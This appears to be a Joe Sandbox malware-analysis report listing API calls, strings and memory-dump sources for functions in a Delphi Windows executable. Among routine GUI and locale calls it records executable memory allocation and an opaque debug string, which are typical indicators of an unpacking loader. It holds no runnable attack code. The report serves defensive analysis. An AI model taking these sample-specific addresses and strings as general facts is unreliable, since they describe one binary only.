Part of subcall function 0040598C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
Part of subcall function 0040598C: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
Part of subcall function 0040598C: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
Part of subcall function 0040598C: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Locales, xrefs: 00405B74, 00405B92
Software\Borland\Delphi\Locales, xrefs: 00405BB0

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00455F9C, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392

APIs

Part of subcall function 00455E50: SetThreadLocale.KERNEL32(00000400,?,?,?,0045600F,00000000,0045662C), ref: 00455E73

Part of subcall function 00456690: IsIconic.USER32(00000000), ref: 00456698
Part of subcall function 00456690: SetActiveWindow.USER32(00000000), ref: 004566B0
Part of subcall function 00456690: IsWindowEnabled.USER32(00000000), ref: 004566D3
Part of subcall function 00456690: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
Part of subcall function 00456690: DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00456740: IsIconic.USER32(?), ref: 00456748
Part of subcall function 00456740: SetActiveWindow.USER32(?), ref: 00456759
Part of subcall function 00456740: IsWindowEnabled.USER32(00000000), ref: 0045677C
Part of subcall function 00456740: DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 00456795
Part of subcall function 00456740: SetWindowPos.USER32(?,00000000,00000000,?,?,0045618A,00000000), ref: 004567DB
Part of subcall function 00456740: SetFocus.USER32(00000000), ref: 00456820

Part of subcall function 00456674: LoadIconA.USER32(00000000,00007F00), ref: 0045668A

PostMessageA.USER32(?,0000B001,00000000,00000000), ref: 00456281

Part of subcall function 00455DB4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00455E07

PostMessageA.USER32(?,0000B000,00000000,00000000), ref: 0045625F
SendMessageA.USER32(?,?,?,?), ref: 00456315

Part of subcall function 0040B8E4: SetErrorMode.KERNEL32 ref: 0040B8EE
Part of subcall function 0040B8E4: LoadLibraryA.KERNEL32(00000000), ref: 0040B91D

GetProcAddress.KERNEL32(00000000,RegisterAutomation,00000000,0045662C), ref: 004563A4
GetLastError.KERNEL32(00000000,0045662C), ref: 004563CD

Part of subcall function 00456A14: IsWindowEnabled.USER32(00000000), ref: 00456A50

IsWindowEnabled.USER32(00000000), ref: 0045645F
IsWindowVisible.USER32(00000000), ref: 00456474
GetFocus.USER32 ref: 00456488
SetFocus.USER32(00000000), ref: 00456497
SetFocus.USER32(00000000), ref: 004564B6
IsIconic.USER32(?), ref: 00456528
GetFocus.USER32 ref: 00456535

Part of subcall function 0044DEDC: GetCurrentThreadId.KERNEL32(Function_0004DE78,00000000,0045358A,00000000,00000000,004535DD), ref: 0044DEF6
Part of subcall function 0044DEDC: EnumThreadWindows.USER32(00000000,Function_0004DE78,00000000), ref: 0044DEFC

SetFocus.USER32(00000000), ref: 00456556

Part of subcall function 0045707C: PostMessageA.USER32(?,0000B01F,?,?), ref: 0045719D

Part of subcall function 00456B98: SendMessageA.USER32(00080148,0000B020,00000001,?), ref: 00456BBC

Part of subcall function 00456B3C: SendMessageA.USER32(00080148,0000B020,00000000,?), ref: 00456B5E

Part of subcall function 00441ED8: SystemParametersInfoA.USER32(00000068,00000000,00433DB0,00000000), ref: 00441F1C
Part of subcall function 00441ED8: SendMessageA.USER32(90C30000,00000000,00000000,00000000), ref: 00441F2F

Part of subcall function 00455F14: DefWindowProcA.USER32(?,?,?,?), ref: 00455F3E

Strings

vcltest3.dll, xrefs: 00456374
RegisterAutomation, xrefs: 00456395
dKF, xrefs: 004565E1

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00405C50, Relevance: 15.1, APIs: 10, Instructions: 98

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Locales, xrefs: 00405B74, 00405B92
Software\Borland\Delphi\Locales, xrefs: 00405BB0

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0045B794, Relevance: 3.1, APIs: 2, Instructions: 96

APIs

VirtualAlloc.KERNEL32(00000000,000065E4,00003000,00000040), ref: 0045B7ED
GetConsoleCP.KERNEL32 ref: 0045B84B

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00455A80, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130

APIs

Part of subcall function 0041C830: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

GetClassInfoA.USER32(00400000,00455768,?), ref: 00455AD5
RegisterClassA.USER32(0045CC38), ref: 00455AED

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Part of subcall function 00407100: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

SetWindowLongA.USER32(0000000E,000000FC,10800000), ref: 00455B89
DeleteMenu.USER32(00000000,0000F010,00000000), ref: 00455BFC

Part of subcall function 00456674: LoadIconA.USER32(00000000,00007F00), ref: 0045668A

SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455BAB
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00455BBE
GetSystemMenu.USER32(0000000E,00000000), ref: 00455BC9
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00455BD8
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00455BE5

Strings

H@F, xrefs: 00455AA9
hKF, xrefs: 00455B8E, 00455BEA
hWE, xrefs: 00455AC9, 00455B60

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00442338, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103

APIs

GetCurrentProcessId.KERNEL32(?,00000000,004424B0), ref: 00442359
GlobalAddAtomA.KERNEL32(00000000), ref: 0044238C
GetCurrentThreadId.KERNEL32(?,?,00000000,004424B0), ref: 004423A7
GlobalAddAtomA.KERNEL32(00000000), ref: 004423DD
RegisterClipboardFormatA.USER32(00000000), ref: 004423F3

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(0041177C,?,?,00442409,00000000,00000000,?,?,00000000,004424B0), ref: 00413F9B

Part of subcall function 00441F3C: SetErrorMode.KERNEL32(00008000), ref: 00441F55
Part of subcall function 00441F3C: GetModuleHandleA.KERNEL32(USER32,00000000,004420A2,?,00008000), ref: 00441F79
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,004420A2,?,00008000), ref: 00441F86
Part of subcall function 00441F3C: LoadLibraryA.KERNEL32(IMM32.DLL), ref: 00441FA2
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FC4
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FD9
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FEE
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442003
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442018
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2), ref: 0044202D
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000), ref: 00442042
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00442057
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0044206C
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00442081
Part of subcall function 00441F3C: SetErrorMode.KERNEL32(?,004420A9,00008000), ref: 0044209C

Part of subcall function 00454694: GetKeyboardLayout.USER32(00000000), ref: 004546D9
Part of subcall function 00454694: GetDC.USER32(00000000), ref: 0045472E
Part of subcall function 00454694: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00454738
Part of subcall function 00454694: ReleaseDC.USER32(00000000,00000000), ref: 00454743

Part of subcall function 00455778: LoadIconA.USER32(00400000,MAINICON), ref: 0045585D
Part of subcall function 00455778: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00442448,00000000,00000000,?,?,00000000,004424B0), ref: 0045588F
Part of subcall function 00455778: OemToCharA.USER32(?,?), ref: 004558A2
Part of subcall function 00455778: CharLowerA.USER32(?), ref: 004558E2

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442477
GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442488

Strings

ControlOfs%.8X%.8X, xrefs: 004423BB
USER32, xrefs: 00442472
AnimateWindow, xrefs: 00442482
Delphi%.8X, xrefs: 0044236A

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00455778, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0045585D
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00442448,00000000,00000000,?,?,00000000,004424B0), ref: 0045588F
OemToCharA.USER32(?,?), ref: 004558A2
CharLowerA.USER32(?), ref: 004558E2

Part of subcall function 00455A80: GetClassInfoA.USER32(00400000,00455768,?), ref: 00455AD5
Part of subcall function 00455A80: RegisterClassA.USER32(0045CC38), ref: 00455AED
Part of subcall function 00455A80: SetWindowLongA.USER32(0000000E,000000FC,10800000), ref: 00455B89
Part of subcall function 00455A80: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455BAB
Part of subcall function 00455A80: SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00455BBE
Part of subcall function 00455A80: GetSystemMenu.USER32(0000000E,00000000), ref: 00455BC9
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00455BD8
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00455BE5
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F010,00000000), ref: 00455BFC

Strings

MAINICON, xrefs: 00455850
,@F, xrefs: 00455855, 00455887
4@F, xrefs: 004558FD

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00401A54, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48

APIs

RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Strings

M!, xrefs: 00401A5A

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0045B894, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28

APIs

GetConsoleCP.KERNEL32 ref: 0045B898
GetVersion.KERNEL32 ref: 0045B8AF
OutputDebugStringA.KERNEL32(XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH), ref: 0045B8BE

Part of subcall function 0045B794: VirtualAlloc.KERNEL32(00000000,000065E4,00003000,00000040), ref: 0045B7ED
Part of subcall function 0045B794: GetConsoleCP.KERNEL32 ref: 0045B84B

Strings

Z5, xrefs: 0045B8A1
XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH, xrefs: 0045B8B9

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044256C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34

APIs

GetVersion.KERNEL32(00000000,004425F2), ref: 00442586

Part of subcall function 00442338: GetCurrentProcessId.KERNEL32(?,00000000,004424B0), ref: 00442359
Part of subcall function 00442338: GlobalAddAtomA.KERNEL32(00000000), ref: 0044238C
Part of subcall function 00442338: GetCurrentThreadId.KERNEL32(?,?,00000000,004424B0), ref: 004423A7
Part of subcall function 00442338: GlobalAddAtomA.KERNEL32(00000000), ref: 004423DD
Part of subcall function 00442338: RegisterClipboardFormatA.USER32(00000000), ref: 004423F3
Part of subcall function 00442338: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442477
Part of subcall function 00442338: GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442488

Strings

l'D, xrefs: 004425DA
*C, xrefs: 004425A0, 004425AA, 004425B4, 004425C4, 004425D4
H&D, xrefs: 004425CA

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

GetSystemMetrics.USER32(?), ref: 004264D6

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

KiUserApcDispatcher.NTDLL(?), ref: 0042649C

Strings

GetSystemMetrics, xrefs: 00426484

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00402140, Relevance: 3.1, APIs: 2, Instructions: 124

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,004022BC), ref: 0040218B
RtlLeaveCriticalSection.KERNEL32(004645C4,004022C3), ref: 004022B6

Part of subcall function 00401A54: RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
Part of subcall function 00401A54: RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
Part of subcall function 00401A54: LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
Part of subcall function 00401A54: RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0040156C, Relevance: 2.5, APIs: 2, Instructions: 37

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401875), ref: 0040159B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401875), ref: 004015C2

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
